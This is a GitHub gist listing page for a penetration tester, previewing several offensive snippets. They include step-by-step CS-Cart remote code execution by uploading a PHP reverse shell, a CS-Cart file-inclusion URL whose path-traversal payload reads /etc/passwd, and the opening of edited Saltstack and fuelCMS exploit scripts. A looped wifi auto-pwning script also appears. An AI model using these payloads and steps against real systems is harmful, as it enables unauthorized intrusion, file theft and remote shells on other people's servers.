Skip to content

Instantly share code, notes, and snippets.

View momenbasel's full-sized avatar
💭
👨‍💻👨‍💻

Moamen Basel momenbasel

💭
👨‍💻👨‍💻
92 followers · 175 following
View GitHub Profile
@momenbasel
momenbasel / gist:149eec9d8004e10414f68454decec538
Created November 18, 2022 20:33
script for reading burpsuite scope and extract the urls
#!/usr/bin/python3
#script for reading burpsuite scope and extract the urls
#requirements
#python3 -m pip install -U find_domains iplookup python-whois
#or pip3 install -r requirements.txt
@momenbasel
momenbasel / ip_list.py
Created October 24, 2022 08:57
get ips from cidr file
from netaddr import IPNetwork
import socket
from contextlib import closing
ips = open("ips.txt", "r") #insert here IP file here
ip_arr= (ips.read().strip()).split('\n')
@momenbasel
momenbasel / pwning with PI
Last active February 26, 2021 18:52
infiniteScript.py
#!/bin/python2.7
import subprocess
import time
while True:
proc = subprocess.Popen('./wifi-autopwner.sh', stdin=subprocess.PIPE)
proc.communicate("71")
time.sleep(720000)
@momenbasel
momenbasel / saltstack.py
Created October 2, 2020 13:48
edited Saltstack 3000.1 - Remote Code Execution
# Exploit Title: Saltstack 3000.1 - Remote Code Execution
# Date: 2020-05-04
#edited: 2020-10-02
#the edit: instead of testing locally --first--, making it testing remotely
# Exploit Author: Jasper Lievisse Adriaanse
# Vendor Homepage: https://www.saltstack.com/
# Version: < 3000.2, < 2019.2.4, 2017.*, 2018.*
# Tested on: Debian 10 with Salt 2019.2.0
# CVE : CVE-2020-11651 and CVE-2020-11652
# Description: Saltstack authentication bypass/remote code execution
@momenbasel
momenbasel / thm-OneLiner.js
Created September 23, 2020 17:38
THM add 1 hour automatically, so you can hack peacefully without worrying about expiring the machine.
setInterval(function(){addHour(); console.log(" : <= Added '1 Hour' times! \n"); }, 3600000);
//adds one hour every half-hour
@momenbasel
momenbasel / rce.phtml
Created September 23, 2020 15:48
cs cart authenticated RCE
get PHP shells from http://pentestmonkey.net/tools/web-shells/php-reverse-shell
edit IP && PORT
Upload to file manager
change the extension from .php to .phtml
visit http://[victim]/skins/shell.phtml --> Profit. ...!
@momenbasel
momenbasel / gist:a683e991c8758e62704a28a2b90f087e
Created September 23, 2020 15:22
CS-Cart 1.3.3 - 'classes_dir' Remote File Inclusion
http://www.site.com/[CS-Cart_path]/classes/phpmailer/class.cs_phpmailer.php?classes_dir=[evil_scripts]%00
example:
http://www.site.com/[CS-Cart_path]/classes/phpmailer/class.cs_phpmailer.php?classes_dir=../../../../../../../../../../../etc/passwd%00
@momenbasel
momenbasel / tp.sh
Last active April 3, 2024 22:47
tp-link Tl-wn722n v2/v3 monitoring && packet injection. atheros ar9271
apt update -y && apt upgrade -y && apt dist-upgrade
sudo apt-get install linux-headers-$(uname -r) -y
sudo apt install bc -y
sudo rmmod r8188eu.ko
git clone https://github.com/aircrack-ng/rtl8188eus
cd rtl8188eus
sudo -i
echo "blacklist r8188eu.ko" > "/etc/modprobe.d/realtek.conf"
exit
make
@momenbasel
momenbasel / fuel.py
Created September 18, 2020 21:08
python3 edited fuelCMS 1.4.1 exploit (https://www.exploit-db.com/exploits/47138) 2018-16763
#!/bin/python3
import requests
import urllib
url = "http://rhost/"
def find_nth_overlapping(haystack, needle, n):
start = haystack.find(needle)
while start >= 0 and n > 1:
start = haystack.find(needle, start+1)
n -= 1
@momenbasel
momenbasel / keybase
Created August 22, 2020 22:32
### Keybase proof
I hereby claim:
* I am momenbasel on github.
* I am momenbasel (https://keybase.io/momenbasel) on keybase.
* I have a public key ASDSSlAYzNrBAGr2Rxh2xaRlZXUIZ3B2aMqyoeoQIvVFoQo
To claim this, I am signing this object: